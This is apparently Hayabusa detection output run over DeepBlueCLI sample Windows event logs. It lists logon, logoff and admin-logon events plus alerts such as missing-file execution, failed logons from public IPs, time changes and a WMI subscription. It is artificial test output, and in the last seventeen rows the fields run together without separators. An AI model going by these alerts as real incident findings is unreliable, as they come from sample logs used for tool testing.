2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:15:39.306 +09:00,IE9Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7462016-08-18 23:47:38.430 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7472016-08-18 23:47:38.430 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7482016-08-18 23:47:38.430 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x1dc1erules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7492016-08-18 23:48:31.289 +09:00IE10Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x1ee41rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7502016-08-18 23:49:38.281 +09:00IE10Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7512016-08-18 23:49:39.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7522016-08-18 23:49:39.844 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7532016-08-18 23:49:39.844 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7542016-08-18 23:49:40.000 +09:00IE10Win74648informationalExplicit LogonSource User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7552016-08-18 23:49:40.000 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7562016-08-18 23:49:40.000 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7572016-08-18 23:49:40.000 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x1b293rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7582016-08-18 23:51:41.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7592016-08-18 23:51:41.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7602016-08-18 23:52:55.692 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7612016-08-18 23:52:55.692 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7622016-08-19 00:28:28.043 +09:00IE10Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x1b2fdrules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
